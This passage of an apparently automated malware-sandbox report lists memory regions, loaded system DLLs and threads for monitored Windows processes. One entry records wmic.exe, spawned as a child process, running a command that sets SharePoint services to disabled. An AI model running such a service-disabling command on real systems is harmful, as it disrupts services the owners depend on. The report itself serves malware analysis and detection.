pagefile_backed name = "pagefile_0x00007df5ff8b0000" filename = "" Region: id = 4800 start_va = 0x7ff6c4190000 end_va = 0x7ff6c41b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4190000" filename = "" Region: id = 4801 start_va = 0x7ff6c41b9000 end_va = 0x7ff6c41b9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41b9000" filename = "" Region: id = 4802 start_va = 0x7ff6c41be000 end_va = 0x7ff6c41bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41be000" filename = "" Region: id = 4803 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 4804 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4805 start_va = 0x4a108d0000 end_va = 0x4a109cffff entry_point = 0x0 region_type = private name = "private_0x0000004a108d0000" filename = "" Region: id = 4806 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4807 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4808 start_va = 0x4a10800000 end_va = 0x4a1080ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a10800000" filename = "" Region: id = 4809 start_va = 0x4a10810000 end_va = 0x4a10816fff entry_point = 0x0 region_type = private name = "private_0x0000004a10810000" filename = "" Region: id = 4810 start_va = 0x4a10880000 end_va = 0x4a108bffff entry_point = 0x0 region_type = private name = "private_0x0000004a10880000" filename = "" Region: id = 4811 start_va = 0x4a108c0000 end_va = 0x4a108c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a108c0000" filename = "" Region: id = 4812 start_va = 0x4a109d0000 end_va = 0x4a10a8dfff entry_point = 0x4a109d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4813 start_va = 0x4a10a90000 end_va = 0x4a10a96fff entry_point = 0x0 region_type = private name = "private_0x0000004a10a90000" filename = "" Region: id = 4814 start_va = 0x4a10aa0000 end_va = 0x4a10aa0fff entry_point = 0x0 region_type = private name = "private_0x0000004a10aa0000" filename = "" Region: id = 4815 start_va = 0x4a10ab0000 end_va = 0x4a10ab0fff entry_point = 0x0 region_type = private name = "private_0x0000004a10ab0000" filename = "" Region: id = 4816 start_va = 0x4a10c20000 end_va = 0x4a10c2ffff entry_point = 0x0 region_type = private name = "private_0x0000004a10c20000" filename = "" Region: id = 4817 start_va = 0x4a10c30000 end_va = 0x4a10db7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a10c30000" filename = "" Region: id = 4818 start_va = 0x4a10dc0000 end_va = 0x4a10f40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a10dc0000" filename = "" Region: id = 4819 start_va = 0x4a10f50000 end_va = 0x4a1234ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a10f50000" filename = "" Region: id = 4820 start_va = 0x7ff6c4090000 end_va = 0x7ff6c418ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4090000" filename = "" Region: id = 4821 start_va = 0x7ff6c41bc000 end_va = 0x7ff6c41bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c41bc000" filename = "" Region: id = 4822 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 4823 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4824 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4825 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4826 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4827 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4828 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4829 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4830 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4831 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4832 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4833 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 318 os_tid = 0xc78 Thread: id = 319 os_tid = 0x42c Thread: id = 320 os_tid = 0x820 Process: id = "75" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x3aa8c000" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "73" os_parent_pid = "0xc44" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4847 start_va = 0x7c0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 4848 start_va = 0x7e0000 end_va = 0x7e1fff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 4849 start_va = 0x7f0000 end_va = 0x803fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 4850 start_va = 0x810000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 4851 start_va = 0x850000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 4852 start_va = 0x890000 end_va = 0x893fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 4853 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 4854 start_va = 0x8b0000 end_va = 0x8b1fff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 4855 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 4856 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 4857 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4858 start_va = 0x7ebf0000 end_va = 0x7ec12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebf0000" filename = "" Region: id = 4859 start_va = 0x7ec15000 end_va = 0x7ec15fff entry_point = 0x0 region_type = private name = "private_0x000000007ec15000" filename = "" Region: id = 4860 start_va = 0x7ec19000 end_va = 0x7ec19fff entry_point = 0x0 region_type = private name = "private_0x000000007ec19000" filename = "" Region: id = 4861 start_va = 0x7ec1d000 end_va = 0x7ec1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec1d000" filename = "" Region: id = 4862 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4863 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4864 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 4865 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4866 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 4867 start_va = 0x910000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 4868 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4869 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4870 start_va = 0x930000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 4871 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4872 start_va = 0x7c0000 end_va = 0x7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 4873 start_va = 0x7d0000 end_va = 0x7d3fff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 4874 start_va = 0x8c0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 4875 start_va = 0xa30000 end_va = 0xaedfff entry_point = 0xa30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4876 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 4877 start_va = 0xb40000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 4878 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4879 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4880 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4881 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4882 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4883 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4884 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4885 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4886 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4887 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4888 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4889 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4890 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4891 start_va = 0x7eaf0000 end_va = 0x7ebeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eaf0000" filename = "" Region: id = 4892 start_va = 0x7ec1a000 end_va = 0x7ec1cfff entry_point = 0x0 region_type = private name = "private_0x000000007ec1a000" filename = "" Region: id = 4893 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4894 start_va = 0x7e0000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 4895 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4896 start_va = 0x900000 end_va = 0x900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 4897 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4898 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4899 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4900 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4901 start_va = 0xb50000 end_va = 0xe86fff entry_point = 0xb50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4902 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4903 start_va = 0xe90000 end_va = 0xf78fff entry_point = 0xe90000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4904 start_va = 0x920000 end_va = 0x923fff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 4905 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 4906 start_va = 0xe90000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 4907 start_va = 0xe90000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 4908 start_va = 0x1020000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 4909 start_va = 0xe90000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 4910 start_va = 0xf90000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 4911 start_va = 0x1030000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 4912 start_va = 0xef0000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 4913 start_va = 0x1030000 end_va = 0x110efff entry_point = 0x1030000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4914 start_va = 0x11f0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 4915 start_va = 0x5370000 end_va = 0x576ffff entry_point = 0x0 region_type = private name = "private_0x0000000005370000" filename = "" Region: id = 4916 start_va = 0xb30000 end_va = 0xb30fff entry_point = 0xb30000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 4917 start_va = 0xe90000 end_va = 0xeaffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 4918 start_va = 0xee0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 4919 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4920 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4921 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4922 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4923 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4924 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4925 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4926 start_va = 0xeb0000 end_va = 0xed9fff entry_point = 0xeb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4927 start_va = 0x5770000 end_va = 0x58f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005770000" filename = "" Region: id = 4928 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4929 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4930 start_va = 0xeb0000 end_va = 0xebffff entry_point = 0xeb0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 4931 start_va = 0x5900000 end_va = 0x5a80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005900000" filename = "" Region: id = 4932 start_va = 0x5a90000 end_va = 0x6e8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a90000" filename = "" Region: id = 4933 start_va = 0xec0000 end_va = 0xec0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ec0000" filename = "" Region: id = 4934 start_va = 0xed0000 end_va = 0xed0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 4935 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4936 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4937 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4938 start_va = 0x6e90000 end_va = 0x6faffff entry_point = 0x0 region_type = private name = "private_0x0000000006e90000" filename = "" Region: id = 4939 start_va = 0xef0000 end_va = 0xef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 4940 start_va = 0xf60000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 4941 start_va = 0x1110000 end_va = 0x11c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 4942 start_va = 0xef0000 end_va = 0xef3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 4943 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4944 start_va = 0x1200000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 4945 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4946 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4947 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 4948 start_va = 0xfa0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 4949 start_va = 0xfe0000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 4950 start_va = 0x6e90000 end_va = 0x6ecffff entry_point = 0x0 region_type = private name = "private_0x0000000006e90000" filename = "" Region: id = 4951 start_va = 0x6ed0000 end_va = 0x6f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ed0000" filename = "" Region: id = 4952 start_va = 0x6f10000 end_va = 0x6f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000006f10000" filename = "" Region: id = 4953 start_va = 0x6fa0000 end_va = 0x6faffff entry_point = 0x0 region_type = private name = "private_0x0000000006fa0000" filename = "" Region: id = 4954 start_va = 0x7eaea000 end_va = 0x7eaecfff entry_point = 0x0 region_type = private name = "private_0x000000007eaea000" filename = "" Region: id = 4955 start_va = 0x7eaed000 end_va = 0x7eaeffff entry_point = 0x0 region_type = private name = "private_0x000000007eaed000" filename = "" Region: id = 4956 start_va = 0x7ec16000 end_va = 0x7ec18fff entry_point = 0x0 region_type = private name = "private_0x000000007ec16000" filename = "" Region: id = 4957 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4958 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4959 start_va = 0xf40000 end_va = 0xf54fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 4960 start_va = 0x740c0000 end_va = 0x740ddfff entry_point = 0x740c0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 4961 start_va = 0xf40000 end_va = 0xf44fff entry_point = 0xf40000 region_type = mapped_file name = "wmiutils.dll.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\wmiutils.dll.mui" (normalized: 